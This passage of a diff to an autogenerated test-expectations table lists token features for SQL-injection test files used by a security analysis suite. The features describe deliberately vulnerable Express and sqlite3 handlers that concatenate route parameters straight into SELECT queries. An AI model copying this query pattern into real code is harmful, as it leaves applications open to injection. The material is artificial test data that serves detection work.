$routeParams | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:34:7:45 | $routeParams | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:34:7:45 | $routeParams | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:34:7:45 | $routeParams | contextSurroundingFunctionParameters | ($routeParams) | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:34:7:45 | $routeParams | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:34:7:45 | $routeParams | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:34:7:45 | $routeParams | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:34:7:45 | $routeParams | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:34:7:45 | $routeParams | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:34:7:45 | $routeParams | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:4 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:4 | db | contextSurroundingFunctionParameters | ($routeParams) | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:4 | db | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:4 | db | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:4 | db | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:8 | db.get | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:8 | db.get | contextSurroundingFunctionParameters | ($routeParams) | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:8 | db.get | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:8 | db.get | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:8 | db.get | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:67 | db.get( ... + '"') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:67 | db.get( ... + '"') | contextSurroundingFunctionParameters | ($routeParams) | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:67 | db.get( ... + '"') | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:67 | db.get( ... + '"') | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:67 | db.get( ... + '"') | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:67 | exceptional return of db.get( ... + '"') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:67 | exceptional return of db.get( ... + '"') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:67 | exceptional return of db.get( ... + '"') | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:67 | exceptional return of db.get( ... + '"') | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:3:8:67 | exceptional return of db.get( ... + '"') | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:6:8:8 | get | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:6:8:8 | get | contextSurroundingFunctionParameters | ($routeParams) | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:6:8:8 | get | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:6:8:8 | get | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:6:8:8 | get | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:10:8:42 | 'SELECT ... id = "' | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:10:8:42 | 'SELECT ... id = "' | contextSurroundingFunctionParameters | ($routeParams) | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:10:8:42 | 'SELECT ... id = "' | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:10:8:42 | 'SELECT ... id = "' | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:10:8:42 | 'SELECT ... id = "' | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:10:8:42 | 'SELECT ... id = "' | stringConcatenatedWith | -endpoint- $routeParams.id + '"' | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:10:8:60 | 'SELECT ... rams.id | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:10:8:60 | 'SELECT ... rams.id | contextSurroundingFunctionParameters | ($routeParams) | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:10:8:60 | 'SELECT ... rams.id | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | @@ -4550,18 +21852,161 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:10:8:66 | 'SELECT ... d + '"' | enclosingFunctionName | controller#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:10:8:66 | 'SELECT ... d + '"' | fileImports | sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:10:8:66 | 'SELECT ... d + '"' | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:46:8:57 | $routeParams | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:46:8:57 | $routeParams | contextSurroundingFunctionParameters | ($routeParams) | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:46:8:57 | $routeParams | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:46:8:57 | $routeParams | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:46:8:57 | $routeParams | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:46:8:60 | $routeParams.id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:46:8:60 | $routeParams.id | contextSurroundingFunctionParameters | ($routeParams) | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:46:8:60 | $routeParams.id | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:46:8:60 | $routeParams.id | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:46:8:60 | $routeParams.id | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:46:8:60 | $routeParams.id | stringConcatenatedWith | 'SELECT * FROM Post WHERE id = "' -endpoint- '"' | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:59:8:60 | id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:59:8:60 | id | contextSurroundingFunctionParameters | ($routeParams) | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:59:8:60 | id | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:59:8:60 | id | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:59:8:60 | id | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:64:8:66 | '"' | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:64:8:66 | '"' | contextSurroundingFunctionParameters | ($routeParams) | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:64:8:66 | '"' | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:64:8:66 | '"' | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:64:8:66 | '"' | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:64:8:66 | '"' | stringConcatenatedWith | 'SELECT * FROM Post WHERE id = "' + $routeParams.id -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:1:1:1:0 | this | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:1:1:1:1 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:1:1:1:1 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:1:1:1:1 | db | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:1:1:1:1 | require | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:5:4:11 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:5:4:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:5:4:11 | express | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:5:4:32 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:5:4:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:5:4:32 | express | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:5:4:32 | express ... press') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:5:4:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:5:4:32 | express ... press') | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:15:4:21 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:15:4:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:15:4:21 | require | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:15:4:32 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:15:4:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:15:4:32 | exceptional return of require('express') | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:15:4:32 | require('express') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:15:4:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:15:4:32 | require('express') | fileImports | express sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:23:4:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:23:4:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:23:4:31 | 'express' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:23:4:31 | 'express' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:23:4:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:4:23:4:31 | 'express' | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:5:5:11 | sqlite3 | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:5:5:11 | sqlite3 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:5:5:11 | sqlite3 | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:5:5:42 | sqlite3 | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:5:5:42 | sqlite3 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:5:5:42 | sqlite3 | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:5:5:42 | sqlite3 ... rbose() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:5:5:42 | sqlite3 ... rbose() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:5:5:42 | sqlite3 ... rbose() | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:21 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:21 | require | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:32 | exceptional return of require('sqlite3') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:32 | exceptional return of require('sqlite3') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:32 | exceptional return of require('sqlite3') | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:32 | require('sqlite3') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:32 | require('sqlite3') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:32 | require('sqlite3') | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:40 | require ... verbose | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:40 | require ... verbose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:40 | require ... verbose | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:42 | exceptional return of require ... rbose() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:42 | exceptional return of require ... rbose() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:42 | exceptional return of require ... rbose() | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:42 | require ... rbose() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:42 | require ... rbose() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:15:5:42 | require ... rbose() | fileImports | express sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:23:5:31 | 'sqlite3' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:23:5:31 | 'sqlite3' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:23:5:31 | 'sqlite3' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:23:5:31 | 'sqlite3' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:23:5:31 | 'sqlite3' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:23:5:31 | 'sqlite3' | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:34:5:40 | verbose | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:34:5:40 | verbose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:5:34:5:40 | verbose | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:5:6:6 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:5:6:6 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:5:6:6 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:5:6:6 | db | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:5:6:41 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:5:6:41 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:5:6:41 | db | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:5:6:41 | db = ne ... mory:') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:5:6:41 | db = ne ... mory:') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:5:6:41 | db = ne ... mory:') | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:10:6:41 | exceptional return of new sql ... mory:') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:10:6:41 | exceptional return of new sql ... mory:') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:10:6:41 | exceptional return of new sql ... mory:') | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:10:6:41 | new sql ... mory:') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:10:6:41 | new sql ... mory:') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:10:6:41 | new sql ... mory:') | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:14:6:20 | sqlite3 | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:14:6:20 | sqlite3 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:14:6:20 | sqlite3 | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:14:6:29 | sqlite3.Database | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:14:6:29 | sqlite3.Database | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:14:6:29 | sqlite3.Database | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:22:6:29 | Database | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:22:6:29 | Database | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:22:6:29 | Database | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:31:6:40 | ':memory:' | CalleeFlexibleAccessPath | sqlite3.Database | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:31:6:40 | ':memory:' | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:31:6:40 | ':memory:' | calleeImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:31:6:40 | ':memory:' | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:31:6:40 | ':memory:' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:6:31:6:40 | ':memory:' | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:5:8:7 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:5:8:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:5:8:7 | app | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:5:8:19 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:5:8:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:5:8:19 | app | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:5:8:19 | app = express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:5:8:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:5:8:19 | app = express() | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:11:8:17 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:11:8:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:11:8:17 | express | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:11:8:19 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:11:8:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:11:8:19 | exceptional return of express() | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:11:8:19 | express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:11:8:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:11:8:19 | express() | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:1:9:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:1:9:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:1:9:3 | app | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:1:9:7 | app.get | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:1:9:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:1:9:7 | app.get | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:1:11:2 | app.get ... "');\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:1:11:2 | app.get ... "');\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:1:11:2 | app.get ... "');\\n}) | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:1:11:2 | exceptional return of app.get ... "');\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:1:11:2 | exceptional return of app.get ... "');\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:1:11:2 | exceptional return of app.get ... "');\\n}) | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:5:9:7 | get | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:5:9:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:5:9:7 | get | fileImports | express sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:9:9:19 | '/post/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:9:9:19 | '/post/:id' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:9:9:19 | '/post/:id' | calleeImports | express | @@ -4569,6 +22014,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:9:9:19 | '/post/:id' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:9:9:19 | '/post/:id' | fileImports | express sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:9:9:19 | '/post/:id' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:9:21 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:9:21 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:9:21 | db | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:9:21 | db | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:9:21 | db | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:9:21 | this | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:9:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:9:21 | this | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:9:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:9:21 | this | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | 'arguments' object of anonymous function | fileImports | express sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | exceptional return of anonymous function | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " req params id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | exceptional return of anonymous function | fileImports | express sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | functio ... '"');\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | functio ... '"');\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | functio ... '"');\\n} | calleeImports | express | @@ -4576,6 +22041,57 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | functio ... '"');\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | functio ... '"');\\n} | fileImports | express sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | functio ... '"');\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:22:11:1 | return of anonymous function | enclosingFunctionBody | req res db get SELECT * FROM Post WHERE id = " 